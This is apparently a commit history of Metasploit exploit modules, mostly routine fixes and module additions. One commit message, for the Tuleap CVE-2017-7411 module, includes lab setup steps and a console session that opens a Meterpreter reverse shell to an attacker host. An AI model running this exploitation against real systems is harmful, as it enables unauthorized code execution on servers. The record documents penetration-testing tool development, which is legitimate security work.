7a09dcb408
Fix #9109 , HttpServer (TcpServer) backgrounding
2017-11-01 13:35:04 -05:00
e3ac6b8dc2
Land #9109 , wp-mobile-detector upload and execute
2017-11-01 13:25:16 -05:00
3847a68494
Clean up module
2017-11-01 13:23:32 -05:00
0973bfb922
Update tuleap_rest_unserialize_exec.rb
2017-11-01 16:37:14 +01:00
6985e1b940
Add module for CVE-2017-7411: Tuleap <= 9.6 Second-Order PHP Object Injection
...
This PR contains a module to exploit [CVE-2017-7411](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7411 ), a Second-Order PHP Object Injection vulnerability in Tuleap before version 9.7 that might allow authenticated users to execute arbitrary code with the permissions of the webserver. The module has been tested successfully with Tuleap versions 9.6, 8.19, and 8.8 deployed in a Docker container.
## Verification Steps
The quickest way to install an old version of Tuleap is through a Docker container. So install Docker on your system and go through the following steps:
1. Run `docker volume create --name tuleap`
2. Run `docker run -ti -e VIRTUAL_HOST=localhost -p 80:80 -p 443:443 -p 22:22 -v tuleap:/data enalean/tuleap-aio:9.6`
3. Run the following command in order to get the "Site admin password": `docker exec -ti <container_name> cat /data/root/.tuleap_passwd`
4. Go to `https://localhost/account/login.php ` and log in as the "admin" user
5. Go to `https://localhost/admin/register_admin.php?page=admin_creation ` and create a new user (NOT Restricted User)
6. Open a new browser session and log in as the newly created user
7. From this session go to `https://localhost/project/register.php ` and make a new project (let's name it "test")
8. Come back to the admin session, go to `https://localhost/admin/approve-pending.php ` and click on "Validate"
9. From the user session you can now browse to `https://localhost/projects/test/ ` and click on "Trackers" -> "Create a New Tracker"
10. Make a new tracker by choosing e.g. the "Bugs" template, fill all the fields and click on "Create"
11. Click on "Submit new artifact", fill all the fields and click on "Submit"
12. You can now test the MSF module by using the user account created at step n.5
NOTE: successful exploitation of this vulnerability requires an user account with permissions to submit a new Tracker artifact or access already existing artifacts, which means it might be exploited also by a "Restricted User".
## Demonstration
```
msf > use exploit/unix/webapp/tuleap_rest_unserialize_exec
msf exploit(tuleap_rest_unserialize_exec) > set RHOST localhost
msf exploit(tuleap_rest_unserialize_exec) > set USERNAME test
msf exploit(tuleap_rest_unserialize_exec) > set PASSWORD p4ssw0rd
msf exploit(tuleap_rest_unserialize_exec) > check
[*] Trying to login through the REST API...
[+] Login successful with test:p4ssw0rd
[*] Updating user preference with POP chain string...
[*] Retrieving the CSRF token for login...
[+] CSRF token: 089d56ffc3888c5bc90220f843f582aa
[+] Login successful with test:p4ssw0rd
[*] Triggering the POP chain...
[+] localhost:443 The target is vulnerable.
msf exploit(tuleap_rest_unserialize_exec) > set PAYLOAD php/meterpreter/reverse_tcp
msf exploit(tuleap_rest_unserialize_exec) > ifconfig docker0 | grep "inet:" | awk -F'[: ]+' '{ print $4 }'
msf exploit(tuleap_rest_unserialize_exec) > set LHOST 172.17.0.1
msf exploit(tuleap_rest_unserialize_exec) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Trying to login through the REST API...
[+] Login successful with test:p4ssw0rd
[*] Updating user preference with POP chain string...
[*] Retrieving the CSRF token for login...
[+] CSRF token: 01acd8380d98c587b37ddd75ba8ff6f7
[+] Login successful with test:p4ssw0rd
[*] Triggering the POP chain...
[*] Sending stage (33721 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:56572) at 2017-11-01 16:07:01 +0100
meterpreter > getuid
Server username: codendiadm (497)
```
2017-11-01 16:09:14 +01:00
037c58d1f6
wp-mobile-detector udpates
2017-10-27 10:10:04 -04:00
cfd7761818
wp_mobile_detector rce
2017-10-20 23:19:58 -04:00
fd028338e1
move psh to polycom so no more powershell name collision
2017-10-20 20:08:11 -04:00
9b75ef7c36
Land #8343 , qmail Shellshock module
2017-09-29 00:28:30 -05:00
daedf0d904
Clean up module
2017-09-29 00:27:22 -05:00
6289cc0b70
Merge branch 'spellin' of https://github.com/h00die/metasploit-framework into spellin
2017-09-08 22:20:39 -04:00
0910c482a9
35 pages of spelling done
2017-09-08 22:19:55 -04:00
2ebf53b647
Minor tweaks...
2017-09-08 10:04:47 -05:00
00c593e0a2
55 pages of spelling done
2017-09-07 21:18:50 -04:00
b8f56d14e0
Land #8698 , Add HEADERS to php_eval module
2017-08-14 09:54:22 -04:00
6300758c46
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
838b066abe
Merge branch 'master' into land-8716
2017-07-24 05:51:44 -07:00
6bb745744b
Land #8471 , Add VICIdial user_authorization Unauthenticated Command Execution module
2017-07-21 15:57:08 -05:00
3f6925196b
OCD - store_loot & print_good
2017-07-19 13:02:49 +01:00
ef826b3f2c
OCD - print_good & print_error
2017-07-19 12:48:52 +01:00
b8d80d87f1
Remove last newline after class - Make @wvu-r7 happy
2017-07-19 11:19:49 +01:00
3d4feffc62
OCD - Spaces & headings
2017-07-19 11:04:15 +01:00
4720d1a31e
OCD fixes - Spaces
2017-07-14 08:46:59 +01:00
fd843f364b
Removed extra lines
2017-07-14 08:17:16 +01:00
55cbd9b6a9
Add headers to php_eval
2017-07-10 21:25:27 -04:00
f4820d24fb
add a few more AKA references
2017-07-06 22:43:46 -05:00
d20036e0fb
revise spelling, add heartbleed and tidy checks
2017-06-28 18:50:20 -04:00
461ab4501d
add 'Also known as', AKA 'AKA', to module references
2017-06-28 15:53:00 -04:00
b51fc0a34e
Land #8489 , more httpClient modules use store_valid_credential
2017-06-21 17:18:34 -05:00
1558db375d
update CVE reference in where modules report_vuln
2017-06-05 16:36:44 -05:00
0e145573fc
more httpClient modules use store_valid_credential
2017-05-30 14:56:05 -05:00
018e544295
Add VICIdial user_authorization Unauthenticated Command Execution module
2017-05-27 05:09:38 +00:00
1a8961b5e3
fied typo
2017-05-25 19:14:59 +02:00
b7b1995238
Land #8274 , Wordpress admin upload `check`
2017-05-22 22:08:32 -05:00
d69bfd509f
store the credential using the new store_valid_credential
2017-05-22 15:08:03 -05:00
4def7ce6cc
Land #8327 , Simplify storing credentials
2017-05-18 16:49:01 -05:00
1f4ff30adb
Improve 200 fail_with in wp_phpmailer_host_header
...
One. last. commit. Noticed this in the response body.
2017-05-16 22:38:36 -05:00
29b7aa5b9b
Update fail_with for 200 (bad user?)
2017-05-16 15:03:42 -05:00
7c1dea2f02
Refactor prestager to work with newer Exim
...
Apparently it doesn't like reduce with extract.
2017-05-16 14:22:43 -05:00
7c2fb9acc1
Fix nil bug in Server header check
2017-05-16 10:43:04 -05:00
5fd6cb0890
Remove nil case, since response might be nil
...
It doesn't always return something. Forgot that.
2017-05-15 21:23:49 -05:00
b41427412b
Improve fail_with granularity for 400 error
...
Also corrects BadConfig to NoTarget in another one of my modules. Oops.
2017-05-15 21:15:43 -05:00
1a644cadc4
Add print_good to on_request_uri override
...
Maybe the ability to send prestagers will be a part of CmdStager in the
future, or maybe CmdStager will actually be able to encode for badchars.
2017-05-15 19:17:58 -05:00
c4c55be444
Clarify why we're getting 400 and add fail_with
2017-05-15 18:53:36 -05:00
489d9a6032
Drop module to AverageRanking and note 400 error
2017-05-15 17:35:40 -05:00
2055bf8f65
Add note about PHPMailer being bundled
2017-05-15 14:29:11 -05:00
35670713ff
Remove budding anti-patterns to avoid copypasta
...
While it offers a better OOBE, don't set a default LHOST. Force the user
to think about what they're setting it to. Also, RequiredCmd is largely
unnecessary and difficult to determine ahead of time unless the target
is a virtual appliance or something else "shipped."
2017-05-15 12:56:14 -05:00
c622e3fc22
Deregister URIPATH because it's overridden by Path
2017-05-12 11:56:38 -05:00
84af5d071d
Deregister VHOST because it's overridden by Host
2017-05-12 11:44:10 -05:00
2ae943d981
Use payload common case instead of general case
...
Both x86 and x64 work on x64, but we really expect x64, and there's no
migration to move us from x86 to x64.
2017-05-11 15:43:49 -05:00
09f6c21f94
Add note about Host header limitations
2017-05-10 15:17:20 -05:00
b446cbcfce
Add reference to Exim string expansions
2017-05-10 15:17:20 -05:00
8842764d95
Add some comments about badchars
2017-05-10 15:17:20 -05:00
ecb79f2f85
Use reduce instead of extracting twice
2017-05-10 15:17:20 -05:00
b5f25ab7ca
Use extract instead of doubling /bin/echo
2017-05-10 15:17:20 -05:00
9a64ecc9b0
Create a pure-Exim, one-shot HTTP client
2017-05-10 15:17:20 -05:00
0ce475dea3
Add WordPress 4.6 PHPMailer exploit
2017-05-10 15:17:20 -05:00
b794bfe5db
Land #8335 , rank fixes for the msftidy god
2017-05-07 21:20:33 -05:00
88bef00f61
Add more ranks, remove module warnings
...
../vmware_mount.rb
Rank = Excellent
Exploit uses check code for target availability,
the vulnerability does not require user action,
and the exploit uses privilege escalation to run
arbitrary executables
../movabletype_upgrade_exec.rb
Rank = ExcellentRanking
Exploit utilizes code injection,
has a check for availability
../uptime_file_upload_2.rb
Rank = ExcellentRanking
Exploit allows execution of arbitrary commands,
has a check for availability
../zpanel_information_disclosure_rce.rb
Rank = ExcellentRanking
Exploit allows remote code execution,
implements version check for pChart
../spip_connect_exec.rb
Rank = ExcellentRanking
Exploit utilizes code injection,
has a check for availability
../wp_optimizepress_upload.rb
Rank = ExcellentRanking
Exploit allows execution of arbitrary code,
has a check for availability
../wing_ftp_admin_exec.rb
Rank = ExcellentRanking
Exploit allows execution of arbitrary commands,
has a check for availability
../novell_mdm_lfi.rb
Rank = ExcellentRanking
Exploit allows execution of arbitrary code,
has a check for availability
../run_as.rb
Rank = ExcellentRanking
Exploit utilizes command injection,
checks system type, and does not require user action
2017-05-07 15:41:26 -04:00
e2fe70d531
convert store_valid_credential to named params
2017-05-05 18:23:15 -05:00
63b6ab5355
simplify valid credential storage
2017-05-04 22:51:40 -05:00
a8983c831d
Updated links and authors
2017-05-04 18:25:45 -04:00
afe801b9e8
Updated target to 'universal'
2017-05-04 16:25:41 +02:00
073cd59cd3
Added qmail_bash_env_exec exploit module, which exploit the ShellShock flaw via Qmail.
2017-05-04 15:44:18 +02:00
64452de06d
Fix msf/core and self.class msftidy warnings
...
Also fixed rex requires.
2017-05-03 15:44:51 -05:00
03e4ee91c2
Correct Ghostscript 9.2.1 to 9.21 as per advisory
2017-05-01 16:23:14 -05:00
afc804fa03
Quick Ghostscript module based on the public PoC
2017-04-28 09:56:52 -05:00
bdeeb8ee1d
Add a check
2017-04-18 16:32:06 -05:00
06ca406d18
Fix weird whitespace
2017-04-09 22:23:58 -05:00
74dc7e478f
update piwik module
2017-04-05 20:19:07 +02:00
baa473a1c6
add piwik superuser plugin upload module
2017-02-11 00:20:50 +01:00
934b05e736
Land #7310 , at(1) persistence module
2016-12-22 03:33:58 -06:00
b65a62ba93
Clean up module
2016-12-22 03:33:08 -06:00
41355898fa
Remove extra def report_cred in vbulletin_vote_sqli_exec
2016-12-01 15:31:24 -06:00
f313389be4
Merge remote-tracking branch 'upstream/master' into land-7507-uuid-arch
2016-11-20 19:08:56 -06:00
8cd9a9b670
Deprecate wp_ninja_forms_unauthenticated_file_upload
...
wp_ninja_forms_unauthenticated_file_upload actually supports
multiple platforms.
Instead of using:
exploit/unix/webapp/wp_ninja_forms_unauthenticated_file_upload
Please use:
exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload
2016-11-10 11:17:09 -06:00
57eabda5dc
Merge upstream/master
2016-10-29 13:54:31 +10:00
d918e25bde
Land #7439 , Add Ghostscript support to ImageMagick Exploit
2016-10-28 17:07:13 -05:00
1d617ae389
Implement first pass of architecture/platform refactor
2016-10-28 07:16:05 +10:00
1da40b5deb
Change HAVE_POPEN to USE_POPEN
...
PS target doesn't support it, so the option should be renamed.
2016-10-14 11:58:39 -05:00
acec45c8b3
Land #7409 , CVE-2013-5093 Graphite Pickle Handling - Add Version Check
2016-10-14 08:54:57 -05:00
5b46e72aea
Update module logic
2016-10-13 17:40:16 -05:00
6f4f2bfa5f
Add PS target and remove MIFF
2016-10-13 17:39:55 -05:00
e70ba8110d
Update references
2016-10-13 17:35:55 -05:00
88bb2e2295
Update description
2016-10-13 17:35:30 -05:00
7c20f20493
remove unneeded bash
2016-10-07 21:12:27 -04:00
fb0a438fdf
Perform a version check to determine exploitability for graphite pickle
2016-10-05 16:08:02 -07:00
f60d575d62
Add EOF newline back in
2016-10-04 11:14:15 -05:00
b1cb153c31
Make errors more meaningful
2016-10-03 15:29:40 -05:00
f838c9990f
Fix nonce bug in wp_ninja_forms_unauthenticated_file_upload
...
If wordpress saves the nonce value in JavaScript, we could get an
undefined method for nil.
2016-09-27 11:30:52 -05:00
e315ec4e73
Merge branch 'master' into bug/7321/fix-ssh-modules
2016-09-19 15:27:37 -05:00
3bc566a50c
fix email
2016-09-18 20:09:38 -04:00
a7103f2155
Fix missing form inputs
...
Also improve check string.
2016-09-15 19:19:24 -05:00
01327f0265
Land #7245 , NetBSD mail.local privilege escalation module
2016-09-14 16:07:12 -05:00
27be29edb4
Fix typo
2016-09-14 13:21:37 -05:00
7352029497
first round of SSL damage fixes
2016-09-13 17:42:31 -05:00
ed5bbb9885
Land #7284 , Add SugarCRM REST PHP Object Injection exploit
2016-09-13 15:46:46 -05:00
a0095ad809
Check res properly and update Ruby syntax
...
If res is nil, it should not be doing res.code
2016-09-13 15:45:57 -05:00
1ce9aedb97
parenthesis for condition expression
2016-09-13 03:37:47 -05:00
fd16c1c3b7
Fix issue-7295
2016-09-13 01:32:20 -05:00
df5fdbff41
Add module for KIS-2016-07: SugarCRM REST PHP Object Injection
...
This PR contains a module to exploit KIS-2016-07, a PHP Object Injection vulnerability in SugarCRM CE before version 6.5.24 that allows unauthenticated users to execute arbitrary PHP code with the permissions of the webserver. Successful exploitation of this vulnerability should require SugarCRM to be running on PHP before version 5.6.25 or 7.0.10, which fix CVE-2016-7124.
2016-09-07 01:58:41 +02:00
748c959cba
forgot to save before PR
2016-08-25 21:45:17 -04:00
5dff01625d
working code
2016-08-25 21:32:25 -04:00
226ded8d7e
Land #6921 , Support basic and form auth at the same time
2016-08-25 16:31:26 -05:00
f2e2cb6a5e
cant transfer file
2016-08-21 19:42:29 -04:00
6306fa5aa5
Per discussion in #7195 , trying a different route. Currently this compiles, then passes the binary. However, there isn't a reliable binary transfer method at this point, so the rewrite from this point will be to transfer the ascii file, then compile on system (gcc is installed by default I believe)
2016-08-21 19:16:04 -04:00
4228868c29
Clean up after yourself
...
Can't use FileDropper. :(
2016-08-16 23:09:14 -05:00
1f63f8f45b
Don't override payload
...
pl is a cheap replacement.
2016-08-16 23:08:53 -05:00
b3402a45f7
Add generic payloads
...
Useful for testing and custom stuff.
2016-08-16 23:08:09 -05:00
2fed51bb18
Land #7115 , Drupal CODER exploit
2016-08-15 01:15:23 -05:00
62d28f10cb
Clean up Mehmet modules
2016-08-15 01:12:58 -05:00
b4846e5793
Enabling cmd_bash payload type with bash-tcp cmd
2016-08-13 00:14:25 +03:00
d38e9f8ceb
Using # instead of ;. Semicolon is causing msg in error.log.
2016-08-12 23:35:29 +03:00
ba79579202
Extending Space limitation up to 250
2016-08-12 22:32:49 +03:00
abf435d6c2
Land #6960 , Auth bypass for Polycom HDX video endpoints
2016-08-01 14:02:50 -05:00
5309f2e4fb
endpoints, not end points
2016-08-01 14:02:17 -05:00
b34201e65c
restore session as an instance variable
2016-08-01 13:58:54 -05:00
dadafd1fdf
Use data:// instead of bogus web server and check() improvements.
2016-07-26 13:31:46 +03:00
780e83dabb
Fix for Opt params and Space limits
2016-07-22 20:48:15 +03:00
7e9c5f9011
Fix for double space and indentation
2016-07-21 20:27:52 +03:00
634ee93de4
Add Drupal CODER remote command execution
2016-07-21 20:23:54 +03:00
32f1c83c9e
Switch to single quotes
...
Might as well, since we're avoiding escaping.
2016-07-21 00:10:17 -05:00
2e631cab5b
Prefer quoting over escaping
...
Having to escape backslashes in a single-quoted string sucks.
2016-07-21 00:02:08 -05:00
c6b309d5c9
Fix drupal_restws_exec check method false positive
2016-07-20 23:28:49 -05:00
8bd6db8bd7
Land #7108 , Drupal RESTWS exploit
2016-07-20 13:49:37 -05:00
b49a847c98
Fix additional things
2016-07-20 13:49:23 -05:00
51bb950201
Avoid return where not required
2016-07-20 21:27:51 +03:00
b0a0544627
Remove random string from URI
2016-07-20 20:50:10 +03:00
ff63e6e05a
Land #7018 , unvendor net-ssh
2016-07-19 17:06:35 -05:00
089816236d
Remove double spaces and fix checkcode
2016-07-20 00:01:25 +03:00
9c8e351ba8
Use vars_get un send_request_cgi
2016-07-19 20:12:14 +03:00
ec2f8fcc71
Change check method and use meterpreter instead of unix cmd
2016-07-19 11:13:06 +03:00
650034b600
Use normalize_uri params instead of string concatenation
2016-07-19 01:01:05 +03:00
c8deb54938
Add Drupal RESTWS Remote Unauth PHP Code Exec
2016-07-18 21:32:10 +03:00
b08d1ad8d8
Revert "Land #6812 , remove broken OSVDB references"
...
This reverts commit 2b016e02167b1d9596c7
2016-07-15 12:00:31 -05:00
b6b52952f4
set ssh to non-interactive
...
have to set the non-interactive flag so that it does not
prompt the user on an incorrect password
MS-1688
2016-07-14 11:12:03 -05:00
01d0d1702b
Merge branch 'master' into feature/MS-1688/net-ssh-cleanup
2016-07-14 09:48:28 -05:00
b2c3267a2a
Land #7042 , fetch_ninja_form_nonce/wponce fix
2016-07-13 11:38:11 -05:00
f164afaef8
Land #6932 , joomla_contenthistory_sqli_rce fixes
2016-07-12 14:26:49 -05:00
310332b521
Clean up module
2016-07-12 11:17:10 -05:00
b869b890c7
Land #7090 , Add module for Tikiwiki Upload Exec
2016-07-12 11:16:50 -05:00
2471e8bc8c
Add FileDropper to cleanup properly
2016-07-12 11:16:18 -05:00
43833c8756
Fixing double normalize function call
2016-07-12 07:30:18 +03:00
2b016e0216
Land #6812 , remove broken OSVDB references
2016-07-11 22:59:11 -05:00
fc56ab6722
Fixing some coding style because of rubocop
2016-07-11 23:10:18 +03:00
e79c3ba7c0
Tiki Wiki unauth rce
2016-07-11 22:44:07 +03:00
1ecef265a1
Do a fail_with in case nonce is not found at all
2016-06-30 11:21:45 -05:00
e2b9225907
Fix #7022 , Failing to find wpnonce in fetch_ninja_form_nonce
...
This patch fixes a problem when the module is used against an older
version of ninja forms (such as 2.9.27), the nonce is found in a
hidden input instead of the JavaScript code, which actually causes
an undefined method 'gsub' bug in the module.
Fix #7022
2016-06-30 11:15:38 -05:00
3d93c55174
move sshfactory into a mixin method
...
use a convience method to DRY up creation
of the SSHFactory inside modules. This will make it easier
to apply changes as needed in future. Also changed msframework attr
to just framework as per our normal convention
MS-1688
2016-06-28 15:23:12 -05:00
6c3871bd0c
update ssh modules to use new SSHFactory
...
updated all of our SSh based module to use the
new SSHFactory class to plug Rex::Sockets into
Net::SSH
MS-1688
2016-06-24 13:55:28 -05:00
baa603b637
wvu-r7 rex sleep suggestions
2016-06-15 20:41:25 -04:00
16b4829d57
fixed socket.get issue
2016-06-09 21:36:21 -04:00
63db330a02
rubocop fixes, msftidy fixes
2016-06-09 21:03:57 -04:00
027f538300
original from EDB
2016-06-09 20:35:00 -04:00
4354b5d5d6
Changed class from Metasploit3 to MetasploitModule
2016-06-03 17:43:41 -07:00
99790e343d
Removed debug statement
2016-06-03 17:36:00 -07:00
9128ba3e57
Add popen() vuln to ImageMagick exploit
...
So... we've actually been sitting on this vuln for a while now. Now that
the cat's out of the bag [1], I'm updating the module. :)
Thanks to @hdm for his sharp eye. ;x
[1] http://permalink.gmane.org/gmane.comp.security.oss.general/19669
2016-06-02 11:35:37 -05:00
7f92088242
Revised the SQL query for the exploits/unix/webapps/joomla_content_history_sqli_rce.rb. The exploit is now working for me.
2016-06-01 09:47:32 -07:00
14adcce8bf
Missed the HTTPUSERNAME fix
2016-05-27 18:37:04 -05:00
61f9cc360b
Correct casing - should be HttpUsername and HttpPassword
2016-05-27 18:31:54 -05:00
4dcddb2399
Fix #4885 , Support basic and form auth at the same time
...
When a module uses the HttpClient mixin but registers the USERNAME
and PASSWORD datastore options in order to perform a form auth,
it ruins the ability to also perform a basic auth (sometimes it's
possible to see both). To avoid option naming conflicts, basic auth
options are now HTTPUSERNAME and HTTPPASSWORD.
Fix #4885
2016-05-27 16:25:42 -05:00
14e1baf331
Minor style changes
2016-05-25 15:39:26 -05:00
19c4d5b02b
Remove hard coded target path
2016-05-25 18:04:26 +01:00
adb8098b8c
Fix typo
2016-05-24 00:16:04 +01:00
aae7c25603
Add WordPress Ninja Forms unauthenticated file upload module
2016-05-23 23:47:41 +01:00
1bc2ec9c11
Update vulnerable versions to include 6.x (legacy)
2016-05-05 14:18:42 -05:00
26b749ff5a
Add default LHOST
...
This is a massive workaround and probably shouldn't be done. :-)
2016-05-05 14:18:42 -05:00
5c713d9f75
Set default payload
...
Land #6849 for this to be effective.
2016-05-05 14:18:42 -05:00
232cc114de
Change placeholder text to something useful
...
A la Shellshock. :)
2016-05-05 14:18:42 -05:00
f32c7ba569
Add template generation details
2016-05-05 14:18:42 -05:00
23a0517a01
Update description
2016-05-05 14:18:42 -05:00
d7b76c3ab4
Add more references
2016-05-05 14:18:42 -05:00
5c04db7a09
Add ImageMagick exploit
2016-05-05 14:18:42 -05:00
816bc91e45
Resolve #6807 , remove all OSVDB references.
...
OSVDB is no longer a vulnerability database, therefore all the
references linked to it are invalid.
Resolve #6807
2016-04-23 12:32:34 -05:00
252632a802
Use %w{} for a couple things
...
Why not? :)
2016-04-13 19:38:57 -05:00
de004d7da3
Line up some hash rockets
2016-04-13 19:32:35 -05:00
f8e4253e2f
Add telnet to RequiredCmd
...
Baffles me that cmd/unix/reverse isn't cmd/unix/reverse_telnet.
2016-04-13 18:22:28 -05:00
07ee18a62b
Do something shady with the exploit method
...
Hat tip @acammack-r7.
2016-04-13 18:15:17 -05:00
43e74fce9e
Add Exim privesc
2016-04-13 17:51:20 -05:00
1d1a495a93
Style check
2016-04-13 10:19:57 -05:00
b61175c6b4
Add Dell Kace K1000 unauthenticated remote root exploit
2016-04-12 16:15:37 +00:00
1375600780
Land #6644 , datastore validation on assignment
2016-03-17 11:16:12 -05:00
3123175ac7
use MetasploitModule as a class name
2016-03-08 14:02:44 +01:00
f703fa21d6
Revert "change Metasploit3 class names"
...
This reverts commit 666ae14259
2016-03-07 13:19:55 -06:00
44990e9721
Revert "change Metasploit4 class names"
...
This reverts commit 3da9535e22
2016-03-07 13:19:48 -06:00
3da9535e22
change Metasploit4 class names
2016-03-07 09:57:22 +01:00
666ae14259
change Metasploit3 class names
2016-03-07 09:56:58 +01:00
c7c0e12bb3
remove various module hacks for the datastore defaults not preserving types
2016-03-05 23:11:39 -06:00
3d1861b3f4
Land #6526 , integrate {peer} string into logging by default
2016-02-15 15:19:26 -06:00
12256a6423
Remove now-redundant peer
...
These all include either Msf::Exploit::Remote:Tcp or Msf::Exploit::Remote:HttpClient
2016-02-01 15:12:03 -06:00
a7cd5991ac
Add encoding of the upload path into the module
2016-01-17 22:44:41 +00:00
5660c1238b
Fix problem causing upload to fail on versions 1.2 and 1.3 of theme
2016-01-17 18:44:00 +00:00
283cf5b869
Update msftidy to catch more potential URL vs PACKETSTORM warnings
...
Fix the affected modules
2015-12-24 09:12:24 -08:00
27a6aa0be1
Fix current msftidy warnings about PACKETSTORM vs URL
2015-12-24 09:05:02 -08:00
11c1eb6c78
Raise Msf::NoCompatiblePayloadError if generate_payload_exe fails
...
Most exploits don't check nil for generate_payload_exe, they just
assume they will always have a payload. If the method returns nil,
it ends up making debugging more difficult. Instead of checking nil
one by one, we just raise.
2015-12-08 21:13:23 -06:00
16d0d53150
Update Shellshock modules, add Advantech coverage
2015-12-01 10:40:46 -06:00
b2d6458f50
Land #6129 , Joomla SQLi RCE
2015-11-20 14:30:23 -06:00
7c5d292e42
Land #6201 , chkrootkit privesc
2015-11-19 10:37:30 -06:00
657e50bb86
Clean up module
2015-11-18 12:50:57 -06:00
f86f427d54
Move Compat into Payload so that is actually used
2015-11-09 16:06:05 -06:00
William Vu
EgiX
h00die
Pearce Barry
Brent Cook
g0tmi1k
Matt Robinson
Jin Qian
Jeffrey Martin
Brendan Coles
nks
James Lee
Bryan Chu
Gabriel Follon
HD Moore
Christian Mehlmauer
wchen-r7
OJ
dmohanty-r7
funkypickle
David Maloney
William Webb
nixawk
h00die
Mehmet Ince
amarionette
rastating
Jon Hart
HD Moore